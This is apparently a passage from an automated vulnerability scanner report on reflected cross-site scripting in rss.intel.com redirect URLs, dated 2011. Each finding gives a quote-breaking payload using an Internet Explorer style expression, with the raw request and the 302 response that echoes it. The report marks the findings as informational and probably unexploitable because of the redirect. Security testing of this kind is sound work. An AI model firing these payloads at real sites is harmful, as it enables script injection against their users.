GET /click/~rss-182178-c1-2641719eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:21:59 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-2641719eca7"style="x:expression(alert(1))"a9ac5ac8d70
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-2641719eca7"style="x:expression(alert(1))"a9ac5ac8d70">
...[SNIP]...

4.46. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb04"style%3d"x%3aexpression(alert(1))"01502404417 was submitted in the REST URL parameter 3. This input was echoed as bbb04"style="x:expression(alert(1))"01502404417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.combbb04"style%3d"x%3aexpression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.combbb04"style="x:expression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio
Content-Length: 209
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.combbb04"style="x:expression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio">
...[SNIP]...

4.47. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc was submitted in the REST URL parameter 4. This input was echoed as 5111a"style="x:expression(alert(1))"83dfca4f7dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community5111a"style="x:expression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community5111a"style="x:expression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.48. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4 was submitted in the REST URL parameter 5. This input was echoed as d438a"style="x:expression(alert(1))"543ef26b9c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroomd438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:13 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomd438a"style="x:expression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomd438a"style="x:expression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.49. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22 was submitted in the REST URL parameter 6. This input was echoed as 6e1b4"style="x:expression(alert(1))"65332bacd22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog6e1b4"style="x:expression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog6e1b4"style="x:expression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.50. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e was submitted in the REST URL parameter 7. This input was echoed as 69bd1"style="x:expression(alert(1))"bfde37c43e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style="x:expression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 233
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style="x:expression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.51. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d was submitted in the REST URL parameter 8. This input was echoed as 2e21a"style="x:expression(alert(1))"7ce44f0bd7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:28 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style="x:expression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style="x:expression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.52. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf was submitted in the REST URL parameter 9. This input was echoed as 9f5e1"style="x:expression(alert(1))"2081e06e0bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style="x:expression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style="x:expression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.53. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 was submitted in the REST URL parameter 10. This input was echoed as a2087"style="x:expression(alert(1))"9f34ca0a49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style="x:expression(alert(1))"9f34ca0a49?cid=rss-182178-c1-264172
Content-Length: 218
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style="x:expression(alert(1))"9f34ca0a49?cid=rss-182178-c1-264172">
...[SNIP]...

4.54. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8 was submitted in the REST URL parameter 2. This input was echoed as b8099"style="x:expression(alert(1))"7fdc79223e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:21:59 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172b8099"style="x:expression(alert(1))"7fdc79223e8
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172b8099"style="x:expression(alert(1))"7fdc79223e8">
...[SNIP]...

4.55. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48 was submitted in the REST URL parameter 3. This input was echoed as a0ea1"style="x:expression(alert(1))"2d8c663cb48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.coma0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.coma0ea1"style="x:expression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up
Content-Length: 194
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.coma0ea1"style="x:expression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up">here</a>

4.56. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e was submitted in the REST URL parameter 4. This input was echoed as 37f9d"style="x:expression(alert(1))"5528cd11f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community37f9d"style="x:expression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community37f9d"style="x:expression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.57. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829 was submitted in the REST URL parameter 5. This input was echoed as c273f"style="x:expression(alert(1))"5a8a63b8829 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroomc273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomc273f"style="x:expression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomc273f"style="x:expression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.58. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06 was submitted in the REST URL parameter 6. This input was echoed as 975bc"style="x:expression(alert(1))"2eca44a5c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog975bc"style="x:expression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog975bc"style="x:expression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.59. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d was submitted in the REST URL parameter 7. This input was echoed as 45d4d"style="x:expression(alert(1))"ddfc2782d6d in the application's response.

